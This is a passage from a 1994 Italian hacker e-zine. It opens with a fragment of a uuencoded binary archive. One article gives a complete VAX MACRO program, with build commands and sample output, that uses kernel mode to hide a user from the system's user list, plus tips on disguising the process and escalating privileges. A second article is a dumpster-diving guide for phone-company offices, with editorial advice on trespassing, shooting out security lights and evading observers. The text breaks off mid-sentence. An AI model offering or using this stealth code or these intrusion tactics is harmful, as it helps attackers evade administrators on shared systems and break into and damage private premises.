MG[(V1/9$_S<F&H!A+5<^%I%/M4)ZZLQ_FJ[`)/$C)<9N,:=K.4FHH@.]\NY1h
MNB817*,57#<R3?(,PAIY=O?VB[&19<8F<<>A;">609O#\VP!Z^C87NIUZ7$[h
M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh
M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh
MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h
M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\<M.>14L7),JQ*4'&S(DS)TN03=..h
ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h
M.'#@@`&V@04WE0^)AH8B9[60<L?8,"%#A@PBX18M_I?84`)CE>T%AN5H7``Rh
M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh
M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h
M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh
MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h
M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh
M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h
M$V])O"E#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h
MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h
M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h
MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh
MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h
M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h
$``````#!h
`h
end
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-
[ N.d.r. Complimenti a Hit per il suo ottimo articolo !!! Speriamo che
presto la ns magazine possa diventare sempre piu' tecnica e con piu
collaboratori !!!
Per comunicazioni con Hitman Italy probabilmente seguira' un suo nuovo
indirizzo Internet. Per informazioni contattate la ns redazione al
nostro indirizzi Internet :) ]
-----------------------------------------------------------------
PUBBLICITA' REGRESSO
====================
CYBERPUNK E VIDEOTEL
SU
ARKIMEDE
Nua : 2551604400
Videotel : *52181#
Piu' di 20 aree messaggi, incluse aree sul Cyberpunk !!!!!
----------------------------------------------------------
Per contattare la NS Redazione su Arkimede potete scrivere in CPE su
ARKIMEDE alla casella "Dupree's".
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 5
Per la serie:
Vax, Assembler ed esaurimento nervoso :
---------------------------------------
Presentiamo :
MINCHIA !
!!
===========
Allora, premesso che NON sono un esperto di Assembler Vax, premesso
che cio' che so e' 1000 volte meno di quello che sa tanta altra brava gente
che sta a chiamare VAX dalla mattina alla sera, premesso tutto quello che
volete voi, mo' provo a scrivere qualche cazzata riguardo a ... boh,
leggete e se vi piace, eiaculate :)
Questo e' un programmillo molto carino, si tratta di un INVI che
pero' risulta essere molto piccino, facile quindi da mandare su un vaxillo
e immediatamente compilabile. Ne esiste uno gia' disponibile, scritto dalla
stessa DIGITAL, col nome "INVI.MAR" ma questo qui e' carinissimo perche'
e' molto piu' piccolo dell'altro. Scusate se scrivo in questo modo, non
sono frocio, ve lo assicuro, e' solo che sono le 5 e mezza del mattino e mi
sento un po' rincoglionito.
Sono riuscito a fare sto programmino sbattendomi qua' e la' tra
listati MAR, files presi da PHRACK o simili, e cose del genere. Alla fine
ce so' riuscito ! (grazie anche all'aiuto di 1 persona che resta sempre
nel mio cuore (informatico) e che qui ringrazio pubblicamente :
GRAZIE PIERGIORGIO! senza il quale non avrei avuto lo stimolo per imparare
certe cose stupende e meravigliose che popolano il ns cyberspazio cosi'
martoriato da intemperie legali .. basta va, sto sparando cazzate :))
Chiamero' questo programmino "MINCHIA.MAR" perche', quando lo
lancerete, esclamerete per l' appunto : "Minchia!!!" :)
----------------------------------INIZIO -----------------------------------
.title "Minchia !!!"
.library /SYS$LIBRARY:LIB.MLB/
.link /SYS$SYSTEM:SYS.STB/
$pcbdef
.entry Minchia,^m<>
$cmkrnl_s routin=Sucamela
ret
.entry Sucamela,^m<>
tstl pcb$l_owner(r4)
bneq VaiACagare
bbcc #pcb$v_inter,pcb$l_sts(r4),VaiACagare
clrb pcb$t_terminal(r4)
decw g^sys$gw_ijobcnt
bisl #pcb$m_noacnt,pcb$l_sts(r4)
VaiACagare:
movl #ss$_normal,r0
ret
.end Minchia
---------------------------------- FINE -----------------------------------
Mamma mia, speriamo sia giusto se no finisce a figura di merda :)
("Figur'immierda" come dicono alcuni miei amici calabresi)
A parte gli scherzi, lo e'. Per mandarlo su un vaxillo fate semplicemente
un miserando
$ CREATE MINCHIA.MAR
Dopodiche' mandate il programmillo in ASCII, e alla fine della
trasmissione premete CTRL-Z. Cosi' avrete il sorgente pronto per essere
compilato coi seguenti schifosissimi comandi :
$ MACRO MINCHIA
$ LINK/NOMAP MINCHIA
(il /NOMAP non e' proprio "necessario" se non ricordo male, pero'
fa scena quindi ce lo metto :) provate un po' voi, CON e SENZA :))
A questo punto avrete generato il programmino MINCHIA.EXE, se
lo lanciate otterrete qualcosa di carino.
Esempio per deficenti :
Supponiamo di avere un utenza "COGLIONAZZO" su un vaxillo. Compiliamo
MINCHIA.EXE e poi facciamo :
---------------- <PRIMA DI AVER LANCIATO "MINCHIA.EXE"> :
$ SH U/F
VAX/VMS User Processes at 25-AUG-1994 05:50:59.73
Total number of users = 6, number of processes = 9
Username Process Name PID Terminal
ANALGAME ANALGAME 00002760 LTA4574:
COITUS COITUS 00001526 LTA4239:
COITUS _LTA4342: 00001A50 LTA4342:
COGLIONAZ COGLIONAZ 00002992 LTA4384: <<<<<<------- NOI *:]
POMPINO POMPINO 0000154F RTA9: (INGOIO::SMEGMA)
SPERM SPERM 00002826 LTA4602: (DSV069/ORGASMATRON)
SPERM SPERM_ 00002827 (subprocess of 00002826)
SYSTEM BATCH_20 00002922 (batch)
SYSTEM SYSTEM 00002734 LTA4559: (DSV913-FISTFUCK_2)
----- ora facciamo
$ Run MINCHIA.EXE
$
----- e adesso :)
$ SH U/F
VAX/VMS User Processes at 25-AUG-1994 05:50:59.73
Total number of users = 5, number of processes = 9
Username Process Name PID Terminal
ANALGAME ANALGAME 00002760 LTA4574:
COITUS COITUS 00001526 LTA4239:
COITUS _LTA4342: 00001A50 LTA4342:
POMPINO POMPINO 0000154F RTA9: (INGOIO::SMEGMA)
SPERM SPERM 00002826 LTA4602: (DSV069-9.P/P4-ORGASM.)
SPERM SPERM_ 00002827 (subprocess of 00002826)
SYSTEM BATCH_20 00002922 (batch)
SYSTEM SYSTEM 00002734 LTA4559: (DSV913-FISTFUCK_2)
Minchia ! (ecco perche' l'ho chiamato cosi' :)))) siamo spariti
dall'elenco utenti !!! Adesso con questo esempio da coglioni avete capito
come fare :) (almeno si spera)
Certo, nell'elenco dei processi rimarra' il vostro processo base.
Conviene allora rinominarlo con un nome che non dia nell'occhio tipo una
coda di stampa :
$ SET PROC /NAME=SYMBIONT_0002
a seconda di quali code di stampa gia' esistono.
Se volete scoprire un utente che e' "MINCHIAto", provate a
esaminare i processi di sistema, a verificare le devices LTA con
SH DEV LTA per esempio (o altri devices) eccetera ...
NOTA : E' possibile inserire del codice per poter modificare questo semplice
programmino e fargli fare cose piu' carine, come ad esempio ottenere privilegi
superiori. Per fare cio' si deve scrivere in una tabella di simboli
particolare (ovviamente in Assembler) che e' questa qua :
Nome simbolico Locazione Uso Riferimento a
------------------------------------------------------------------------------
CTL$GQ_PROCPRIV!P1 Pointer page !permanently enabled privs !SET UIC
PHD$Q_AUTHPRIV !process header !procs allowable privs !$setprv
KFI$Q_PROCPRIV !priv install image!image installed with privs !image actvatr
IHD$Q_PRIVREQS !image header !unused - set for all privs! !image actvatr
PHD$Q_IMAGPRIV !process header !mask for enhanced priv images!$setprv
UAF$Q_PRIV !sysuaf.dat !UAF allowable privs !LOGINOUT
PHD$Q_PRIVMSK !process header !working privilege mask !system srvc's
PCB$Q_PRIV !PCB !same as phd$q_privmsk !device driver
------------------------------------------------------------------------------
Leggo proprio ora alcune fotocopie del "VAX/VMS internals and
data structures" manual :
------
If a process wishes a privilege that is not in its authorized list, one of two
conditions must hold or the requested privilege is not granted.
1)The process must have SETPRV privilege. A process with this privilege can
acquire any other privilege with either the set privilege system service or
DCL command SET PROCESS/PRIVILEGES.
2)The system service was called from executive or kernal mode. This mechanism
is an escape that allows either VMS or user-written system services to
acquire whatever privileges they need without regard for whether the calling
process has SETPRV privilege. Such procedures must disable privileges
granted in this fashion as part of their return path.
------
E' altresi' necessario linkare la tabella dei simboli di sistema al
nostro file oggetto. Di solito e' SYS$SYSTEM:SYS.STB.
COL CAZZO CHE VI DICO COME SI FA ! :) Se siete bravi e avete a
disposizione un vax vostro su cui sperimentare, fate delle prove coll'
assembler dei Vax...
Vabbe', visto che insistete, ecco qui qualche stronzata di HELP
sull'assembler vax. Non ho fatto altro che prendere alcuni HELP online.
----------------------------------------------------------------------
MACRO
Parameters
file-spec[,...]
Specifies one or more VAX MACRO assembly language source files to be
assembled. If you do not specify a file type for an input file, the
assembler uses the default file type of MAR.
You can specify more than one input file. If you separate the file
specifications with commas, each file is assembled separately. If
you separate the file specifications with plus signs, the files are
concatenated and assembled as a single input file, producing single
object and listing files. If a file already exists with the same
name as the object or listing file produced by the command, a new
file with a version number one higher than the previously existing
file will be created.
No wildcard characters are allowed in the file specifications.
MACRO
Qualifiers
/ANALYSIS_DATA
/ANALYSIS_DATA[=file-spec]
/NOANALYSIS_DATA (default)
Creates a file containing source code analysis information. If the
file-spec is omitted, the default file name is the same as the source
program; the default file type is ANA.
The analysis file is reserved for use with Digital layered products,
such as, but not limited to, the VAX Source Code Analyzer.
/CROSS_REFERENCE
/CROSS_REFERENCE[=(function[,...])]
/NOCROSS_REFERENCE (default)
Controls whether a cross-reference listing is included in the listing
file. A cross-reference listing is a list of the places in the
source file where the item specified is defined or referred to. The
/CROSS_REFERENCE qualifier includes a cross-reference listing, and
therefore requires that you specify the /LIST qualifier to produce a
listing file. The /NOCROSS_REFERENCE qualifier excludes the
cross-reference listing.
You can specify one or more of the functions listed below. If you
specify /CROSS_REFERENCE without any functions, it is equivalent to
/CROSS_REFERENCE=(MACROS,SYMBOLS).
ALL Cross-references directives, macros, operation
codes, registers, and symbols
DIRECTIVES Cross-references directives
MACROS Cross-references macros
OPCODES Cross-references operation codes
REGISTERS Cross-references registers
SYMBOLS Cross-references symbols
If you specify more than one function, separate them by commas and
enclose the list in parentheses.
/DEBUG
/DEBUG[=option]
/NODEBUG (default)
Controls whether local symbols are included in the symbol table, and
whether traceback information is included in the object module.
You can use these qualifiers in place of the /ENABLE and /DISABLE
qualifiers, when the DEBUG and TRACEBACK functions are used. The
/DEBUG or /NODEBUG qualifiers will override debugging characteristics
set with the .ENABLE or .DISABLE assembler directives.
You can specify one or more of the functions listed below. If you
specify /DEBUG without any functions, it is equivalent to /DEBUG=ALL.
ALL All local symbols are included in the symbol
table, and all traceback information is provided
in the object module for the debugger.
Specifying this qualifier is equivalent to
specifying the qualifier
/ENABLE=(DEBUG,TRACEBACK).
NONE No local symbols and no traceback information are
made available to the debugger in the object
module. Specifying this qualifier is equivalent
to specifying the qualifier
/DISABLE=(DEBUG,TRACEBACK).
SYMBOLS All local symbols are made available to the
debugger in the object module. No traceback
information is made available to the debugger.
Specifying this qualifier is equivalent to
specifying the qualifiers /ENABLE=DEBUG and
/DISABLE=TRACEBACK.
TRACEBACK Traceback information is made available to the
debugger in the object module. No local symbols
are made available to the debugger. Specifying
this qualifier is equivalent to specifying the
qualifiers /ENABLE=TRACEBACK and /DISABLE=DEBUG.
/DIAGNOSTICS
/DIAGNOSTICS[=file-spec]
/NODIAGNOSTICS (default)
Creates a file containing compiler messages and diagnostic
information. If the file-spec is omitted, the default file name is
the same as the source program; the default file type is DIA.
The diagnostics file is reserved for use with Digital layered
products, such as, but not limited to, the VAX Language Sensitive
Editor.
/DISABLE
/DISABLE=(function[,...])
/NODISABLE
Provides initial settings for the functions controlled by the
assembler directive .DISABLE. See /ENABLE for a list of these
functions.
The default is /DISABLE=(ABSOLUTE,DEBUG,TRUNCATION).
If you specify more than one function, separate them by commas and
enclose the list in parentheses.
The /NODISABLE qualifier has the same effect as not specifying the
/DISABLE qualifier, or negates the effects of any /DISABLE qualifiers
specified earlier on the command line.
/ENABLE
/ENABLE=(function[,...])
/NOENABLE
Provides initial settings for the functions controlled by the
assembler directive .ENABLE. You must specify at least one of the
functions listed below. You can enable or disable:
ABSOLUTE Assembly of relative addresses as absolute
addresses
DEBUG Inclusion of local symbol table information in the
object file for use with the debugger
TRUNCATION Truncation of floating-point numbers (if
truncation is disabled, numbers are rounded)
GLOBAL Assumption that undefined symbols in the assembly
are external symbols
SUPPRESSION Suppression of the listing of unreferenced symbols
in the symbol table
TRACEBACK Provision of information to the debugger traceback
mechanism
The default is /ENABLE=(GLOBAL,TRACEBACK,SUPPRESSION).
If you specify more than one function, separate them by commas and
enclose the list in parentheses.
The /NOENABLE qualifier has the same effect as not specifying the
/ENABLE qualifier, or negates the effects of any /ENABLE qualifiers
specified earlier on the command line.
/LIBRARY
/LIBRARY
/NOLIBRARY
Positional qualifier.
The /LIBRARY qualifier cannot be used with the /UPDATE qualifier.
The /LIBRARY qualifier requires that the associated input file be a
macro library. If you do not specify a file type, the assembler uses
the default file type of MLB. The maximum number of libraries that
can be searched in any given assembly is 16, one of which is always
STARLET.MLB. If you specify more than one macro library in an
assembly, the libraries are searched in reverse order of their
specification.
When a macro call is issued in a source program, any libraries
specified with the .LIBRARY directive are searched first, in the
reverse order in which they were declared; if the macro definition is
not found in any of the libraries specified with the .LIBRARY
directive, any libraries specified in the DCL MACRO command line are
then searched (again, in the reverse order in which they were
specified); finally, if the macro definition is not found in the
libraries specified in the command line, STARLET.MLB is searched.
The /NOLIBRARY qualifier has the same effect as not specifying the
/LIBRARY qualifier, or negates the effects of any /LIBRARY qualifiers
specified earlier on the command line.
/LIST
/LIST[=file-spec]
/NOLIST
Controls whether an output listing is created, and optionally
provides an output file specification for the listing file.
If you issue the MACRO command interactively, the assembler, by
default, does not create a listing file. When /NOLIST is present,
either explicitly or by default, errors are reported on the current
output device.
If you execute the MACRO command in a batch job, /LIST is the
default. When you specify /LIST, you can control the defaults
applied to the output file specification by the placement of the
qualifier in the command. See the VMS DCL Concepts Manual for more
information on entering output file qualifiers.
The default file type provided for listing files is LIS.
No wildcard characters are allowed in the file specification.
/OBJECT
/OBJECT[=file-spec]
/NOOBJECT
Controls whether an object module is created by the assembler. It
also defines the file specification for the file.
By default, the assembler creates an object module with the same file
name as the first input file. The default file type for object files
is OBJ. When you specify /OBJECT, you can control the defaults
applied to the output file specification by the placement of the
qualifier in the command. See the VMS DCL Concepts Manual for more
information on entering output file qualifiers.
No wildcard characters are allowed in the file specification.
/SHOW
/SHOW[=(function[,...])
/NOSHOW[=(function[,...])]
Provides initial settings for the functions controlled by the
assembler directives .SHOW and .NOSHOW. You can specify one or more
of the functions listed below. If you specify /SHOW without any
functions, the listing level count is incremented. If you specify
/NOSHOW without any functions, the listing level count is
decremented.
Since the /SHOW qualifier affects the listing, you must use the /LIST
qualifier to produce a listing in order to use the /SHOW qualifier.
CONDITIONALS Lists unsatisfied conditional code associated with
.IF and .ENDC directives
CALLS Lists macro calls and repeat range expansions
DEFINITIONS Lists macro definitions
EXPANSIONS Lists macro expansions
BINARY Lists binary code generated by the expansion of
macro calls
If you omit the /SHOW qualifier, the default is equivalent to
/SHOW=(CONDITIONALS,CALLS,DEFINITIONS).
If you specify more than one function, separate them by commas and
enclose the list in parentheses.
For additional details on these functions, see the VAX MACRO and
Instruction Set Reference Volume.
/UPDATE
/UPDATE[=(update-file-spec[,...])]
/NOUPDATE
Positional Qualifier.
The /UPDATE qualifier cannot be used with the /LIBRARY qualifier.
The /UPDATE qualifier requires usage with an associated input file
that is to be updated with the specified update file or files. No
wildcard characters are allowed in the update file specifications.
The update process uses the batch editor, SLP, to update the input
file with the update file or files.
By default, the assembler uses update files with the same name as the
input source file and a file type of UPD.
When multiple update files are specified with the /UPDATE qualifier,
the assembler merges the contents into a single list of updates
before applying the updates to the source file. You must separate
multiple update files with commas and enclose the list in
parentheses.
The input source file and update files are not changed by the update
operation. The effects of the update appear in the compiled output.
The listing also provides an audit trail of the changes if you
specify /LIST with /UPDATE.
If an update file is not found, the assembler prints an informational
message but continues the assembly.
The /NOUPDATE qualifier has the same effect as not specifying the
/UPDATE qualifier, or negates the effects of any /UPDATE qualifiers
specified earlier on the command line.
MACRO
Examples
1. $ MACRO ANALSEX
The MACRO assembler assembles the file ORION.MAR and creates an
object file named ANALSEX.OBJ. If this command is executed in a batch
job, the assembler also creates a listing file named ORION.LIS.
2. $ MACRO/LIST SUCCHIA, LYRA/OBJECT=LYRAN
This MACRO command requests two separate assemblies. The MACRO
command assembles SUCCHIA.MAR to produce SUCCHIA.LIS and SUCCHIA.OBJ.
Then it assembles LYRA.MAR and creates a listing file named LYRA.LIS
and an object module named LYRAN.OBJ.
3. $ MACRO ALPHA/LIST+MYLIB/LIBRARY-
$_ + [TEST]OLDLIB/LIBRARY + []BETA
$ PRINT ALPHA
The MACRO command concatenates the files ALPHA.MAR and BETA.MAR to
produce an object file named ALPHA.OBJ and a listing file named
ALPHA.LIS. MYLIB.MLB (in the current default directory) and
OLDLIB.MLB (in the directory [TEST]) are specified as libraries to
be searched for macro definitions. When macro calls are found in
BETA.MAR, OLDLIB, MYLIB, and the system library STARLET.MLB are
searched, in that order, for the definitions.
The PRINT command prints the listing file ALPHA.LIS.
4. $ MACRO DELTA+TESTLIB/LIBRARY, ALPHA+MYLIB/LIBRARY
This MACRO command requests two separate assemblies. TESTLIB.MLB
and the system library STARLET.MLB are searched for macro
definitions when macro calls are found in DELTA.MAR, and MYLIB.MLB
and the system library STARLET.MLB are searched for macro
definitions when macro calls are found in ALPHA.MAR.
MACRO
Directives
The general assembler directives provide facilities for performing 11
types of functions; listing control, message display, assembler
option, data storage, location control, program sectioning, symbol
control, routine entry point, conditional and subconditional
assembly, cross-reference, instruction generation, and linker option.
The alternate form, if any, is given in parentheses.
Additional information available:
.ADDRESS .ALIGN .ASCIx .BLKx .BYTE .CROSS .DEBUG
.DEFAULT .D_FLOATING_(.DOUBLE)
.DISABLE_(.DSABL) .ENABLE_(.ENABL) .END .ENDC .ENDM
.ENDR .ENTRY .ERROR .EVEN
.EXTERNAL_(.EXTRN) .F_FLOATING_(.FLOAT) .G_FLOATING
.GLOBAL_(.GLOBL) .H_FLOATING .IDENT .IF
.IF_FALSE_(.IFF) .IF_TRUE_(.IFT) .IF_TRUE_FALSE_(.IFTF)
.IIF .IRP .IRPC .LIBRARY
.LINK .LONG .MACRO .MASK .MCALL .MDELETE .MEXIT
.NARG .NCHR .NOCROSS .NTYPE
.OCTA .ODD .OPDEF .PACKED .PAGE .PRINT .PSECT
.QUAD .REFn .REPEAT_(.REPT)
.RESTORE_PSECT_(.RESTORE) .SAVE_PSECT_(.SAVE) .SHOW_.NOSHOW
.SIGNED_BYTE .SIGNED_WORD
.SUBTITLE_(.SBTTL) .TITLE .TRANSFER .WARN .WEAK .WORD
MACRO
Instructions
Additional information available:
ACBx ADAWI ADDxx ADDPx ADWC AOBLxx ASHx
ASHP Bxxxx BBx BBxx
BBxxI BICxx BICPSW BISxx BISPSW BITx BLBx
BPT BRx BSBx BUGx
CALLG CALLS CASEx CHMx CLRx CMPx CMPCx
CMPPx CMPxV CRC CVTxx
CVTLP CVTPL CVTPS CVTPT CVTSP CVTTP DECx
DIVxx DIVP EDIV EDITPC
EMODx EMUL EXTxV FFx HALT INCx INDEX
INSQHI INSQTI INSQUE INSV JMP
JSB LDPCTX LOCC MATCHC MCOMx MFPR MNEGx
MOVx MOVAx MOVCx MOVP
MOVPSL MOVTC MOVTUC MOVZxx MTPR MULxx MULP
NOP POLYx POPR PROBEx
PUSHAx PUSHL PUSHR REI REMQHI REMQTI REMQUE
RET ROTL RSB SBWC
SCANC SKPC SOBGxx SPANC SUBxx SUBPx SVPCTX
TSTx XFC XORxx
MACRO
Operand_Formats
Operands for instructions identify the memory locations or the
registers that are used by the machine operation. These operands
specify the addressing mode for the instruction.
Additional information available:
Absolute Autodecrement Autoincrement Autoincrement_deferred
Branch Displacement
Displacement_deferred General Immediate_or_Literal Indexed Register
Register_deferred Relative
Relative_deferred
MACRO
Vector_Instructions
Additional information available:
Assembler_Notation VLD VGATH VST VSCAT VADDL
VCMPL VMULL VSUBL
VBIC,_VBIS,_and_VXOR VSL VADD VCMP VVCVT VDIV
VMUL VSUB VMERGE IOTA MFVP
MTVP VSYNC
---------------------------------------------------------------------
Dando un'okkiara all'HELP di MACRO troverete tutto l'HELP
possibile su MACRO. (Logico no ? e allora che cazzo scrivo ... mah)
Nel prossimo numero di TBP probabilmente parleremo un po' di
assembler vax, ma MOLTO in linea generale in quanto non sono per niente un
esperto di questo argomento. Spero pero' di poter coinvolgere qualcuno che
veramente se ne intende, invece di star qui da solo, come adesso, alle 6
del mattino come un coglione a non capire un cazzo di niente, con una tazza
di caffe' bollente e i nervi a fior di pelle :)
Scusatemi se troverete questo articolo un po' merdoso. Ma per me
va benissimo cosi'. In fondo, chi se ne fotte ! :)
Dupree's Paradise
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 6
DOVE/COME/QUANDO/PERCHE' FARE TRASHING
Scritto da:
----------
Ice MC
----------
Con commenti della redazione
by Dupree's Paradise
Prefazione:
-----------
Questo testo contiene le basi del trashing. Io non credo di esser molto prati-
co visto ke l'ho fatto solo un paio di volte, comunque qui ci sono le basi!
Trashing: Cos'e'?
-----------------
Il Trashing (scarto) e' l'azione della ricerca attraverso i rifiuti presi dai
bidoni della SIP o di qualunque altro Ufficio Telefonico. Lo scarto spesso
contiene cose molto importanti che possono essere da blokki notes dell'ufficio
per imparare ai nuovi operatori delle operazioni importanti (ad esempio.. il
tracciamento di linea.. ecc.) a come funziona un telefono (schemi e cazzate
simili)! In Aggiunta a quelle cose, si possono trovare anke elenchi telefoni-
ci. Nel prossimo paragrafo vedremo qualke suggerimento per eseguire quando o
mentre si esegue un trashing. Lo scarto puo' essere abbastanza fruttuoso e di-
vertente, basta ke venga fatto con attenzione senza prendere bicchieri di
caffe', merdate simili o addirittura essere arrestato!
[[ Nota della Redazione : Il testo e' stato pubblicato cosi' come ci e' perve-
nuto. Ice MC ci ha detto di averlo scritto durante una notte di insonnia tota-
le, in preda a strane visioni mistiche .. :) ]]
Primo Passo: COME LOCALIZZARE IL BERSAGLIO
------------------------------------------
Questo passo consiste nella scelta della posizione di dove far Trashing.
La posizione dove dovrai andare a far Trashing e' l'Ufficio di Scambio che e'
qui' dove succede tutto. Il modo piu' facile per trovare l' U.S. e' cercare
parecchie antenne giganti. (non e' difficile.. di solito stanno sopra i tetti
:-))
Spesso pero' in alcune citta', la spazzatura degli Uffici di Scambi non viene
gettato sotto l'edificio, quindi e' piu' complicato. Io consiglio di andare
alla sede centrale, dove stanno gli uffici per noleggiare telefoni, disabili-
tare numeri... e a volte.. xche' no? .. Abbonarsi a Itapac :-))
Un altro posto per fare trashing e' l'Ufficio di Smistamento dati. Trovarlo e'
molto semplice... questi hanno una sola porta centrale e nessuna finestra... o
una sola porta e qualke finestra con 3000 sbarre (da non confondere con il
carcere).
[[ NdR : In poche parole, i luoghi migliori sono : La centrale che si occupa
dello smistamento delle chiamate dei Cellulari, cioe' il famoso PONTE RADIO.
Spesso nella stessa costruzione del Ponte Radio si trovano anche i Pad di Ita-
Kaz quindi e' bene se si "trova" della spazzatura proveniente da li. In alter-
nativa c'e' sempre la Sede Centrale della Sip, dove cioe' vanno i clienti per
stipulare contratti, acquistare cellulari, telefoni, merdate, insomma, dove va
la gente a Farsi Fottere i Soldi dal (Dis)Servizio di Stato. ]]
Secondo Passo: EQUIPAGGIAMENTO
------------------------------
Ecco una piccola lista dell'equipaggiamento che potresti prendere:
Auto : Porte aperte e luci spente
L'auto non e' necessaria, ma e' utile x scappare veloce-
mente ed e' molto meglio che camminare con 4 sacconi gi-
ganti :-))
[[ NdR : Meglio non dare nell'occhio. Mai guardare direttamente eventuali per-
sone, se no ci si fa accorgere che e' in preparazione qualcosa. Scendete dal-
l'auto, mettetevi a chiacchierare come se niente fosse, fumate una sigaretta,
finche' le persone che possono vedervi mentre "agite" non se ne sono andate.
Ci vuole soprattutto pazienza. Fingete di guardare spesso l'orologio come se
aveste un appuntamento ... Fate soprattutto attenzione non solo alla gente per
la strada (dalle auto difficilmente si accorgono di cio' che fate) ma alla
gente sui balconi dei palazzi che ha un'ottima visuale !!! Inoltre ricordate
di posteggiare a circa 1 metro e mezzo dai cassonetti in modo da restare vici-
ni, fare prima e occultare di piu' la visuale. ]]
Persone: Piu' di uno .. ma meno di sei!
Non andare mai a far trashing da solo. E non portare mai
piu' di cinque persone con te. Questo potrebbe dare un
po' nell'okkio.. vedere sei o sette persone con i sacchi
in mano, abbigliamento scuro e torce ... potrebbero
pensare a una rapina :-) Io raccomando di andare in
tre, ecco un piccolo schema:
Numero di persone : 1 2 3 4 5 6
Persone per prendere i sacchi : 1 1 2 3 3 4
Persone per osservare in giro : 0 1 1 1 2 2
--------- CONSIGLIATO ----------: ^
[[ NdR : Personalmente pensiamo che possa creare svariati problemi essere in
piu' di 3 persone. Se dovete caricare 3 grossi sacchi su una Fiat Panda e sie-
te in 4, non potrete usare i sedili posteriori. Spesso i sacchi sono piu' di
4 ... l'ideale e' essere in 2 persone. Cronometrando un'azione media si riesce
a caricare tutto e ripartire, con molta calma e decisione, in circa 12 secon-
di. Certo, una Station Vagon come quella di Amadeus e' l'ideale :))))) ]]
Equipaggiamento: Secondo me non serve niente di speciale.. se poi
credete di essere rambo...date un'okkiata all'e-
quipaggiamento avanzato :-) .. Io credo che ba-
sti semplicemente un abbigliamento Scuro (niente
abiti fluorescenti o cose spaziali :-))
EQUIPAGGIAMENTO AVANZATO:
Maschera
Guanti
Walkie Talkies / CB
Equipaggiamento Diversivo: Fumo, Gas, Bombe, Bazzoka
Se necessario porta anke qualke Mitra, Fucili, Pistole
:-))
[[ Lunga nota della redazione : L'equipaggiamento. Questa e' una parte molto
pittoresca scritta dal nostro Ice MC, ma e' verosimile che qualche volta si
incappi in qualche contrattempo. In molte centrali la spazzatura sta ALL'IN-
TERNO di recinti o di cortili delle costruzioni Sip. Quindi entrare in tali
luoghi costituisce violazione di domicilio, e in ogni caso reato. In tali casi
alcune persone molto intraprendenti hanno spesso usato sistemi piu' avanzati.
Immaginiamo uno scenario tipo, un cortile interno recintato, con grossi fari a
luce gialla e telecamere. Uno si apposta alla macchina. " partono verso il mu-
retto. Altri 2 armati di Fionda da tiro professionale (costa 50 mila lire,
molto accessibile a tutti) e pallini d'acciaio (gittata con tale fionda, circa
200 metri o piu', potenza di penetrazione : IMPRESSIONANTE), colpiscono ALCUNI
dei fari di illuminazione, cercando di creare un corridoio oscuro per raggiun-
gere la "spazzatura"). Creato il corridoio i 2 tipi in CALZAMAGLIA NERA e dal-
le provate capacita' atletiche, si lanciano verso i cassonetti, afferrano i
sacchi (solitamente leggeri in quanto contengono rifiuti cartacei) ed escono
rapidamente. Caricato tutto in macchina si riparte PIANO, A LUCI SPENTE, per
poi accelerare DOPO aver riacceso le luci a debita distanza.
Altro sistema : 2 persone vestite in modo molto trasandato, su un Ape Car ca-
rico con un po' di scatoloni di cartone e rottami metallici. Basta fingersi
"barboni" o "robivecchi". Non ci saranno problemi a prendere dei sacchi. Nes-
suno rompe i coglioni a chi cerca di farsi una pagnotta rivendendo cartoni u-
sati !!!
Altro metodo : PAGARE uno di questi barboni per fare il sopracitato lavoro.
Con poche lire potrebbero convincersi a fare per voi il giro di ricerca, gior-
nalmente.
p.s. In alcune centrali i rifiuti prima di uscire vengono TRITATI E DISTRUTTI
in appositi distruggi-documenti o inceneritori.
Quindi aggiungiamo all'equipaggiamento avanzato :
-------------------------------------------------
Per azioni Commando-Style : Calzamaglia nera o abiti scuri e comodi come tute
da ginnastica, non indossare nessun oggetto luccicante. Annerire la faccia con
un tappo di sughero bruciacchiato al fuoco. A portata di mano in macchina te-
nete delle salviettine umidificate per ripulire il viso subito dopo l'azione.
Fionda da tiro professionale con fermabraccio e pallini di ac-
ciaio da tiro o sferette in vetro.
Per azioni Barbon-Style : ApeCar, Vestiti trasandati, barba lunga, capelli
sporchi, e meglio se si puzza come porci.
Fine nota della Redazione ]]
Cosa Fare e Cosa NON Fare:
--------------------------
>Fatelo di notte.
>Dopo aver preso i sacchi fai l'ordinamento a casa o in qualsiasi altro posto
diversamente dal parkeggio dell'Ufficio.
[[ Traduzione : Cercate un posto tranquillo per esaminare i sacchi, un garage
con luce elettrica, una villetta di un amico, una seconda casa vuota, un posto
lontano da occhi indiscreti e dove sia possibile esaminare con calma ogni
